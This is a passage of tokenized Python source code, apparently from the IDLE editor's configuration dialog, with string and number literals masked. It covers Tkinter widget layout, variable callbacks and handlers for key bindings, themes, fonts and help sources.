self . SetKeysType , text = "<STR_LIT>" ) <EOL> radioStartupShell = Radiobutton ( frameRun , variable = self . startupEdit , <EOL> value = <NUM_LIT:0> , command = self . SetKeysType , text = '<STR_LIT>' ) <EOL> labelSaveTitle = Label ( frameSave , text = '<STR_LIT>' ) <EOL> labelRunSaveTitle = Label ( frameSave , text = '<STR_LIT>' ) <EOL> radioSaveAsk = Radiobutton ( frameSave , variable = self . autoSave , <EOL> value = <NUM_LIT:0> , command = self . SetKeysType , text = "<STR_LIT>" ) <EOL> radioSaveAuto = Radiobutton ( frameSave , variable = self . autoSave , <EOL> value = <NUM_LIT:1> , command = self . SetKeysType , text = '<STR_LIT>' ) <EOL> labelWinSizeTitle = Label ( frameWinSize , text = '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> labelWinWidthTitle = Label ( frameWinSize , text = '<STR_LIT>' ) <EOL> entryWinWidth = Entry ( frameWinSize , textvariable = self . winWidth , <EOL> width = <NUM_LIT:3> ) <EOL> labelWinHeightTitle = Label ( frameWinSize , text = '<STR_LIT>' ) <EOL> entryWinHeight = Entry ( frameWinSize , textvariable = self . winHeight , <EOL> width = <NUM_LIT:3> ) <EOL> labelParaWidthTitle = Label ( frameParaSize , text = '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> entryParaWidth = Entry ( frameParaSize , textvariable = self . paraWidth , <EOL> width = <NUM_LIT:3> ) <EOL> labelEncodingTitle = Label ( frameEncoding , text = "<STR_LIT>" ) <EOL> radioEncLocale = Radiobutton ( frameEncoding , variable = self . encoding , <EOL> value = "<STR_LIT>" , text = "<STR_LIT>" ) <EOL> radioEncUTF8 = Radiobutton ( frameEncoding , variable = self . encoding , <EOL> value = "<STR_LIT:utf-8>" , text = "<STR_LIT>" ) <EOL> radioEncNone = Radiobutton ( frameEncoding , variable = self . encoding , <EOL> value = "<STR_LIT:none>" , text = "<STR_LIT:None>" ) <EOL> frameHelpList = Frame ( frameHelp ) <EOL> frameHelpListButtons = Frame ( frameHelpList ) <EOL> labelHelpListTitle = Label ( frameHelpList , text = '<STR_LIT>' ) <EOL> scrollHelpList = Scrollbar ( frameHelpList ) <EOL> self . listHelp = Listbox ( frameHelpList , height = <NUM_LIT:5> , takefocus = FALSE , <EOL> exportselection = FALSE ) <EOL> scrollHelpList . config ( command = self . listHelp . yview ) <EOL> self . listHelp . config ( yscrollcommand = scrollHelpList . set ) <EOL> self . listHelp . bind ( '<STR_LIT>' , self . HelpSourceSelected ) <EOL> self . buttonHelpListEdit = Button ( frameHelpListButtons , text = '<STR_LIT>' , <EOL> state = DISABLED , width = <NUM_LIT:8> , command = self . HelpListItemEdit ) <EOL> self . buttonHelpListAdd = Button ( frameHelpListButtons , text = '<STR_LIT>' , <EOL> width = <NUM_LIT:8> , command = self . HelpListItemAdd ) <EOL> self . buttonHelpListRemove = Button ( frameHelpListButtons , text = '<STR_LIT>' , <EOL> state = DISABLED , width = <NUM_LIT:8> , command = self . HelpListItemRemove ) <EOL> frameRun . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameSave . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameWinSize . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameParaSize . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameEncoding . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameHelp . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> labelRunTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelRunChoiceTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioStartupShell . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioStartupEdit . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelSaveTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelRunSaveTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioSaveAuto . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioSaveAsk . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelWinSizeTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> entryWinHeight . pack ( side = RIGHT , anchor = E , padx = <NUM_LIT:10> , pady = <NUM_LIT:5> ) <EOL> labelWinHeightTitle . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> entryWinWidth . pack ( side = RIGHT , anchor = E , padx = <NUM_LIT:10> , pady = <NUM_LIT:5> ) <EOL> labelWinWidthTitle . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> labelParaWidthTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> entryParaWidth . pack ( side = RIGHT , anchor = E , padx = <NUM_LIT:10> , pady = <NUM_LIT:5> ) <EOL> labelEncodingTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioEncNone . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> radioEncUTF8 . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> radioEncLocale . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> frameHelpListButtons . pack ( side = RIGHT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = Y ) <EOL> frameHelpList . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> labelHelpListTitle . pack ( side = TOP , anchor = W ) <EOL> scrollHelpList . pack ( side = RIGHT , anchor = W , fill = Y ) <EOL> self . listHelp . pack ( side = LEFT , anchor = E , expand = TRUE , fill = BOTH ) <EOL> self . buttonHelpListEdit . pack ( side = TOP , anchor = W , pady = <NUM_LIT:5> ) <EOL> self . buttonHelpListAdd . pack ( side = TOP , anchor = W ) <EOL> self . buttonHelpListRemove . pack ( side = TOP , anchor = W , pady = <NUM_LIT:5> ) <EOL> return frame <EOL> def AttachVarCallbacks ( self ) : <EOL> self . fontSize . trace_variable ( '<STR_LIT:w>' , self . VarChanged_fontSize ) <EOL> self . fontName . trace_variable ( '<STR_LIT:w>' , self . VarChanged_fontName ) <EOL> self . fontBold . trace_variable ( '<STR_LIT:w>' , self . VarChanged_fontBold ) <EOL> self . spaceNum . trace_variable ( '<STR_LIT:w>' , self . VarChanged_spaceNum ) <EOL> self . colour . trace_variable ( '<STR_LIT:w>' , self . VarChanged_colour ) <EOL> self . builtinTheme . trace_variable ( '<STR_LIT:w>' , self . VarChanged_builtinTheme ) <EOL> self . customTheme . trace_variable ( '<STR_LIT:w>' , self . VarChanged_customTheme ) <EOL> self . themeIsBuiltin . trace_variable ( '<STR_LIT:w>' , self . VarChanged_themeIsBuiltin ) <EOL> self . highlightTarget . trace_variable ( '<STR_LIT:w>' , self . VarChanged_highlightTarget ) <EOL> self . keyBinding . trace_variable ( '<STR_LIT:w>' , self . VarChanged_keyBinding ) <EOL> self . builtinKeys . trace_variable ( '<STR_LIT:w>' , self . VarChanged_builtinKeys ) <EOL> self . customKeys . trace_variable ( '<STR_LIT:w>' , self . VarChanged_customKeys ) <EOL> self . keysAreBuiltin . trace_variable ( '<STR_LIT:w>' , self . VarChanged_keysAreBuiltin ) <EOL> self . winWidth . trace_variable ( '<STR_LIT:w>' , self . VarChanged_winWidth ) <EOL> self . winHeight . trace_variable ( '<STR_LIT:w>' , self . VarChanged_winHeight ) <EOL> self . paraWidth . trace_variable ( '<STR_LIT:w>' , self . VarChanged_paraWidth ) <EOL> self . startupEdit . trace_variable ( '<STR_LIT:w>' , self . VarChanged_startupEdit ) <EOL> self . autoSave . trace_variable ( '<STR_LIT:w>' , self . VarChanged_autoSave ) <EOL> self . encoding . trace_variable ( '<STR_LIT:w>' , self . VarChanged_encoding ) <EOL> def VarChanged_fontSize ( self , * params ) : <EOL> value = self . fontSize . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_fontName ( self , * params ) : <EOL> value = self . fontName . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_fontBold ( self , * params ) : <EOL> value = self . fontBold . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_spaceNum ( self , * params ) : <EOL> value = self . spaceNum . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_colour ( self , * params ) : <EOL> self . OnNewColourSet ( ) <EOL> def VarChanged_builtinTheme ( self , * params ) : <EOL> value = self . builtinTheme . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . PaintThemeSample ( ) <EOL> def VarChanged_customTheme ( self , * params ) : <EOL> value = self . customTheme . get ( ) <EOL> if value != '<STR_LIT>' : <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . PaintThemeSample ( ) <EOL> def VarChanged_themeIsBuiltin ( self , * params ) : <EOL> value = self . themeIsBuiltin . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , value ) <EOL> if value : <EOL> self . VarChanged_builtinTheme ( ) <EOL> else : <EOL> self . VarChanged_customTheme ( ) <EOL> def VarChanged_highlightTarget ( self , * params ) : <EOL> self . SetHighlightTarget ( ) <EOL> def VarChanged_keyBinding ( self , * params ) : <EOL> value = self . keyBinding . get ( ) <EOL> keySet = self . customKeys . get ( ) <EOL> event = self . listBindings . get ( ANCHOR ) . split ( ) [ <NUM_LIT:0> ] <EOL> if idleConf . IsCoreBinding ( event ) : <EOL> self . AddChangedItem ( '<STR_LIT>' , keySet , event , value ) <EOL> else : <EOL> extName = idleConf . GetExtnNameForEvent ( event ) <EOL> extKeybindSection = extName + '<STR_LIT>' <EOL> self . AddChangedItem ( '<STR_LIT>' , extKeybindSection , event , value ) <EOL> def VarChanged_builtinKeys ( self , * params ) : <EOL> value = self . builtinKeys . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . LoadKeysList ( value ) <EOL> def VarChanged_customKeys ( self , * params ) : <EOL> value = self . customKeys . get ( ) <EOL> if value != '<STR_LIT>' : <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . LoadKeysList ( value ) <EOL> def VarChanged_keysAreBuiltin ( self , * params ) : <EOL> value = self . keysAreBuiltin . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , value ) <EOL> if value : <EOL> self . VarChanged_builtinKeys ( ) <EOL> else : <EOL> self . VarChanged_customKeys ( ) <EOL> def VarChanged_winWidth ( self , * params ) : <EOL> value = self . winWidth . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:width>' , value ) <EOL> def VarChanged_winHeight ( self , * params ) : <EOL> value = self . winHeight . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_paraWidth ( self , * params ) : <EOL> value = self . paraWidth . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_startupEdit ( self , * params ) : <EOL> value = self . startupEdit . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_autoSave ( self , * params ) : <EOL> value = self . autoSave . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_encoding ( self , * params ) : <EOL> value = self . encoding . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def ResetChangedItems ( self ) : <EOL> self . changedItems = { '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> def AddChangedItem ( self , type , section , item , value ) : <EOL> value = str ( value ) <EOL> if not self . changedItems [ type ] . has_key ( section ) : <EOL> self . changedItems [ type ] [ section ] = { } <EOL> self . changedItems [ type ] [ section ] [ item ] = value <EOL> def GetDefaultItems ( self ) : <EOL> dItems = { '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> for configType in dItems . keys ( ) : <EOL> sections = idleConf . GetSectionList ( '<STR_LIT:default>' , configType ) <EOL> for section in sections : <EOL> dItems [ configType ] [ section ] = { } <EOL> options = idleConf . defaultCfg [ configType ] . GetOptionList ( section ) <EOL> for option in options : <EOL> dItems [ configType ] [ section ] [ option ] = ( <EOL> idleConf . defaultCfg [ configType ] . Get ( section , option ) ) <EOL> return dItems <EOL> def SetThemeType ( self ) : <EOL> if self . themeIsBuiltin . get ( ) : <EOL> self . optMenuThemeBuiltin . config ( state = NORMAL ) <EOL> self . optMenuThemeCustom . config ( state = DISABLED ) <EOL> self . buttonDeleteCustomTheme . config ( state = DISABLED ) <EOL> else : <EOL> self . optMenuThemeBuiltin . config ( state = DISABLED ) <EOL> self . radioThemeCustom . config ( state = NORMAL ) <EOL> self . optMenuThemeCustom . config ( state = NORMAL ) <EOL> self . buttonDeleteCustomTheme . config ( state = NORMAL ) <EOL> def SetKeysType ( self ) : <EOL> if self . keysAreBuiltin . get ( ) : <EOL> self . optMenuKeysBuiltin . config ( state = NORMAL ) <EOL> self . optMenuKeysCustom . config ( state = DISABLED ) <EOL> self . buttonDeleteCustomKeys . config ( state = DISABLED ) <EOL> else : <EOL> self . optMenuKeysBuiltin . config ( state = DISABLED ) <EOL> self . radioKeysCustom . config ( state = NORMAL ) <EOL> self . optMenuKeysCustom . config ( state = NORMAL ) <EOL> self . buttonDeleteCustomKeys . config ( state = NORMAL ) <EOL> def GetNewKeys ( self ) : <EOL> listIndex = self . listBindings . index ( ANCHOR ) <EOL> binding = self . listBindings . get ( listIndex ) <EOL> bindName = binding . split ( ) [ <NUM_LIT:0> ] <EOL> if self . keysAreBuiltin . get ( ) : <EOL> currentKeySetName = self . builtinKeys . get ( ) <EOL> else : <EOL> currentKeySetName = self . customKeys . get ( ) <EOL> currentBindings = idleConf . GetCurrentKeySet ( ) <EOL> if currentKeySetName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> keySetChanges = self . changedItems [ '<STR_LIT>' ] [ currentKeySetName ] <EOL> for event in keySetChanges . keys ( ) : <EOL> currentBindings [ event ] = keySetChanges [ event ] . split ( ) <EOL> currentKeySequences = currentBindings . values ( ) <EOL> newKeys = GetKeysDialog ( self , '<STR_LIT>' , bindName , <EOL> currentKeySequences ) . result <EOL> if newKeys : <EOL> if self . keysAreBuiltin . get ( ) : <EOL> message = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> newKeySet = self . GetNewKeysName ( message ) <EOL> if not newKeySet : <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> return <EOL> else : <EOL> self . CreateNewKeySet ( newKeySet ) <EOL> self . listBindings . delete ( listIndex ) <EOL> self . listBindings . insert ( listIndex , bindName + '<STR_LIT>' + newKeys ) <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> self . keyBinding . set ( newKeys ) <EOL> else : <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> def GetNewKeysName ( self , message ) : <EOL> usedNames = ( idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) + <EOL> idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) ) <EOL> newKeySet = GetCfgSectionNameDialog ( self , '<STR_LIT>' , <EOL> message , usedNames ) . result <EOL> return newKeySet <EOL> def SaveAsNewKeySet ( self ) : <EOL> newKeysName = self . GetNewKeysName ( '<STR_LIT>' ) <EOL> if newKeysName : <EOL> self . CreateNewKeySet ( newKeysName ) <EOL> def KeyBindingSelected ( self , event ) : <EOL> self . buttonNewKeys . config ( state = NORMAL ) <EOL> def CreateNewKeySet ( self , newKeySetName ) : <EOL> if self . keysAreBuiltin . get ( ) : <EOL> prevKeySetName = self . builtinKeys . get ( ) <EOL> else : <EOL> prevKeySetName = self . customKeys . get ( ) <EOL> prevKeys = idleConf . GetCoreKeys ( prevKeySetName ) <EOL> newKeys = { } <EOL> for event in prevKeys . keys ( ) : <EOL> eventName = event [ <NUM_LIT:2> : - <NUM_LIT:2> ] <EOL> binding = string . join ( prevKeys [ event ] ) <EOL> newKeys [ eventName ] = binding <EOL> if prevKeySetName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> keySetChanges = self . changedItems [ '<STR_LIT>' ] [ prevKeySetName ] <EOL> for event in keySetChanges . keys ( ) : <EOL> newKeys [ event ] = keySetChanges [ event ] <EOL> self . SaveNewKeySet ( newKeySetName , newKeys ) <EOL> customKeyList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> customKeyList . sort ( ) <EOL> self . optMenuKeysCustom . SetMenu ( customKeyList , newKeySetName ) <EOL> self . keysAreBuiltin . set ( <NUM_LIT:0> ) <EOL> self . SetKeysType ( ) <EOL> def LoadKeysList ( self , keySetName ) : <EOL> reselect = <NUM_LIT:0> <EOL> newKeySet = <NUM_LIT:0> <EOL> if self . listBindings . curselection ( ) : <EOL> reselect = <NUM_LIT:1> <EOL> listIndex = self . listBindings . index ( ANCHOR ) <EOL> keySet = idleConf . GetKeySet ( keySetName ) <EOL> bindNames = keySet . keys ( ) <EOL> bindNames . sort ( ) <EOL> self . listBindings . delete ( <NUM_LIT:0> , END ) <EOL> for bindName in bindNames : <EOL> key = string . join ( keySet [ bindName ] ) <EOL> bindName = bindName [ <NUM_LIT:2> : - <NUM_LIT:2> ] <EOL> if keySetName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> if bindName in self . changedItems [ '<STR_LIT>' ] [ keySetName ] . keys ( ) : <EOL> key = self . changedItems [ '<STR_LIT>' ] [ keySetName ] [ bindName ] <EOL> self . listBindings . insert ( END , bindName + '<STR_LIT>' + key ) <EOL> if reselect : <EOL> self . listBindings . see ( listIndex ) <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> def DeleteCustomKeys ( self ) : <EOL> keySetName = self . customKeys . get ( ) <EOL> if not tkMessageBox . askyesno ( '<STR_LIT>' , '<STR_LIT>' + <EOL> '<STR_LIT>' % ( keySetName ) , <EOL> parent = self ) : <EOL> return <EOL> idleConf . userCfg [ '<STR_LIT>' ] . remove_section ( keySetName ) <EOL> if self . changedItems [ '<STR_LIT>' ] . has_key ( keySetName ) : <EOL> del ( self . changedItems [ '<STR_LIT>' ] [ keySetName ] ) <EOL> idleConf . userCfg [ '<STR_LIT>' ] . Save ( ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioKeysCustom . config ( state = DISABLED ) <EOL> self . optMenuKeysCustom . SetMenu ( itemList , '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuKeysCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . keysAreBuiltin . set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:default>' ) ) <EOL> self . builtinKeys . set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> self . Apply ( ) <EOL> self . SetKeysType ( ) <EOL> def DeleteCustomTheme ( self ) : <EOL> themeName = self . customTheme . get ( ) <EOL> if not tkMessageBox . askyesno ( '<STR_LIT>' , '<STR_LIT>' + <EOL> '<STR_LIT>' % ( themeName , ) , <EOL> parent = self ) : <EOL> return <EOL> idleConf . userCfg [ '<STR_LIT>' ] . remove_section ( themeName ) <EOL> if self . changedItems [ '<STR_LIT>' ] . has_key ( themeName ) : <EOL> del ( self . changedItems [ '<STR_LIT>' ] [ themeName ] ) <EOL> idleConf . userCfg [ '<STR_LIT>' ] . Save ( ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioThemeCustom . config ( state = DISABLED ) <EOL> self . optMenuThemeCustom . SetMenu ( itemList , '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuThemeCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . themeIsBuiltin . set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:default>' ) ) <EOL> self . builtinTheme . set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> self . Apply ( ) <EOL> self . SetThemeType ( ) <EOL> def GetColour ( self ) : <EOL> target = self . highlightTarget . get ( ) <EOL> prevColour = self . frameColourSet . cget ( '<STR_LIT>' ) <EOL> rgbTuplet , colourString = tkColorChooser . askcolor ( parent = self , <EOL> title = '<STR_LIT>' + target , initialcolor = prevColour ) <EOL> if colourString and ( colourString != prevColour ) : <EOL> if self . themeIsBuiltin . get ( ) : <EOL> message = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> newTheme = self . GetNewThemeName ( message ) <EOL> if not newTheme : <EOL> return <EOL> else : <EOL> self . CreateNewTheme ( newTheme ) <EOL> self . colour . set ( colourString ) <EOL> else : <EOL> self . colour . set ( colourString ) <EOL> def OnNewColourSet ( self ) : <EOL> newColour = self . colour . get ( ) <EOL> self . frameColourSet . config ( bg = newColour ) <EOL> if self . fgHilite . get ( ) : plane = '<STR_LIT>' <EOL> else : plane = '<STR_LIT>' <EOL> sampleElement = self . themeElements [ self . highlightTarget . get ( ) ] [ <NUM_LIT:0> ] <EOL> self . textHighlightSample . tag_config ( sampleElement , ** { plane : newColour } ) <EOL> theme = self . customTheme . get ( ) <EOL> themeElement = sampleElement + '<STR_LIT:->' + plane <EOL> self . AddChangedItem ( '<STR_LIT>' , theme , themeElement , newColour ) <EOL> def GetNewThemeName ( self , message ) : <EOL> usedNames = ( idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) + <EOL> idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) ) <EOL> newTheme = GetCfgSectionNameDialog ( self , '<STR_LIT>' , <EOL> message , usedNames ) . result <EOL> return newTheme <EOL> def SaveAsNewTheme ( self ) : <EOL> newThemeName = self . GetNewThemeName ( '<STR_LIT>' ) <EOL> if newThemeName : <EOL> self . CreateNewTheme ( newThemeName ) <EOL> def CreateNewTheme ( self , newThemeName ) : <EOL> if self . themeIsBuiltin . get ( ) : <EOL> themeType = '<STR_LIT:default>' <EOL> themeName = self . builtinTheme . get ( ) <EOL> else : <EOL> themeType = '<STR_LIT:user>' <EOL> themeName = self . customTheme . get ( ) <EOL> newTheme = idleConf . GetThemeDict ( themeType , themeName ) <EOL> if themeName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> themeChanges = self . changedItems [ '<STR_LIT>' ] [ themeName ] <EOL> for element in themeChanges . keys ( ) : <EOL> newTheme [ element ] = themeChanges [ element ] <EOL> self . SaveNewTheme ( newThemeName , newTheme ) <EOL> customThemeList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> customThemeList . sort ( ) <EOL> self . optMenuThemeCustom . SetMenu ( customThemeList , newThemeName ) <EOL> self . themeIsBuiltin . set ( <NUM_LIT:0> ) <EOL> self . SetThemeType ( ) <EOL> def OnListFontButtonRelease ( self , event ) : <EOL> font = self . listFontName . get ( ANCHOR ) <EOL> self . fontName . set ( font . lower ( ) ) <EOL> self . SetFontSample ( ) <EOL> def SetFontSample ( self , event = None ) : <EOL> fontName = self . fontName . get ( ) <EOL> if self . fontBold . get ( ) : <EOL> fontWeight = tkFont . BOLD <EOL> else : <EOL> fontWeight = tkFont . NORMAL <EOL> self . editFont . config ( size = self . fontSize . get ( ) , <EOL> weight = fontWeight , family = fontName ) <EOL> def SetHighlightTarget ( self ) : <EOL> if self . highlightTarget . get ( ) == '<STR_LIT>' : <EOL> self . radioFg . config ( state = DISABLED ) <EOL> self . radioBg . config ( state = DISABLED ) <EOL> self . fgHilite . set ( <NUM_LIT:1> ) <EOL> else : <EOL> self . radioFg . config ( state = NORMAL ) <EOL> self . radioBg . config ( state = NORMAL ) <EOL> self . fgHilite . set ( <NUM_LIT:1> ) <EOL> self . SetColourSample ( ) <EOL> def SetColourSampleBinding ( self , * args ) : <EOL> self . SetColourSample ( ) <EOL> def SetColourSample ( self ) : <EOL> tag = self . themeElements [ self . highlightTarget . get ( ) ] [ <NUM_LIT:0> ] <EOL> if self . fgHilite . get ( ) : plane = '<STR_LIT>' <EOL> else : plane = '<STR_LIT>' <EOL> colour = self . textHighlightSample . tag_cget ( tag , plane ) <EOL> self . frameColourSet . config ( bg = colour ) <EOL> def PaintThemeSample ( self ) : <EOL> if self . themeIsBuiltin . get ( ) : <EOL> theme = self . builtinTheme . get ( ) <EOL> else : <EOL> theme = self . customTheme . get ( ) <EOL> for elementTitle in self . themeElements . keys ( ) : <EOL> element = self . themeElements [ elementTitle ] [ <NUM_LIT:0> ] <EOL> colours = idleConf . GetHighlight ( theme , element ) <EOL> if element == '<STR_LIT>' : <EOL> colours [ '<STR_LIT>' ] = idleConf . GetHighlight ( theme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) <EOL> if theme in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> themeDict = self . changedItems [ '<STR_LIT>' ] [ theme ] <EOL> if themeDict . has_key ( element + '<STR_LIT>' ) : <EOL> colours [ '<STR_LIT>' ] = themeDict [ element + '<STR_LIT>' ] <EOL> if themeDict . has_key ( element + '<STR_LIT>' ) : <EOL> colours [ '<STR_LIT>' ] = themeDict [ element + '<STR_LIT>' ] <EOL> self . textHighlightSample . tag_config ( element , ** colours ) <EOL> self . SetColourSample ( ) <EOL> def HelpSourceSelected ( self , event ) : <EOL> self . SetHelpListButtonStates ( ) <EOL> def SetHelpListButtonStates ( self ) : <EOL> if self . listHelp . size ( ) < <NUM_LIT:1> : <EOL> self . buttonHelpListEdit . config ( state = DISABLED ) <EOL> self . buttonHelpListRemove . config ( state = DISABLED ) <EOL> else : <EOL> if self . listHelp . curselection ( ) : <EOL> self . buttonHelpListEdit . config ( state = NORMAL ) <EOL> self . buttonHelpListRemove . config ( state = NORMAL ) <EOL> else : <EOL> self . buttonHelpListEdit . config ( state = DISABLED ) <EOL> self . buttonHelpListRemove . config ( state = DISABLED ) <EOL> def HelpListItemAdd ( self ) : <EOL> helpSource = GetHelpSourceDialog ( self , '<STR_LIT>' ) . result <EOL> if helpSource : <EOL> self . userHelpList . append ( ( helpSource [ <NUM_LIT:0> ] , helpSource [ <NUM_LIT:1> ] ) ) <EOL> self . listHelp . insert ( END , helpSource [ <NUM_LIT:0> ] ) <EOL> self . UpdateUserHelpChangedItems ( ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def HelpListItemEdit ( self ) : <EOL> itemIndex = self . listHelp . index ( ANCHOR ) <EOL> helpSource = self . userHelpList [ itemIndex ] <EOL> newHelpSource = GetHelpSourceDialog ( self , '<STR_LIT>' , <EOL> menuItem = helpSource [ <NUM_LIT:0> ] , filePath = helpSource [ <NUM_LIT:1> ] ) . result <EOL> if ( not newHelpSource ) or ( newHelpSource == helpSource ) : <EOL> return <EOL> self . userHelpList [ itemIndex ] = newHelpSource <EOL> self . listHelp . delete ( itemIndex ) <EOL> self . listHelp . insert ( itemIndex , newHelpSource [ <NUM_LIT:0> ] ) <EOL> self . UpdateUserHelpChangedItems ( ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def HelpListItemRemove ( self ) : <EOL> itemIndex = self . listHelp . index ( ANCHOR ) <EOL> del ( self . userHelpList [ itemIndex ] ) <EOL> self . listHelp . delete ( itemIndex ) <EOL> self . UpdateUserHelpChangedItems ( ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def UpdateUserHelpChangedItems ( self ) : <EOL> "<STR_LIT>" <EOL> self . changedItems [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { } <EOL> for num in range ( <NUM_LIT:1> , len ( self . userHelpList ) + <NUM_LIT:1> ) : <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , str ( num ) , <EOL> string . join ( self . userHelpList [ num - <NUM_LIT:1> ] [ : 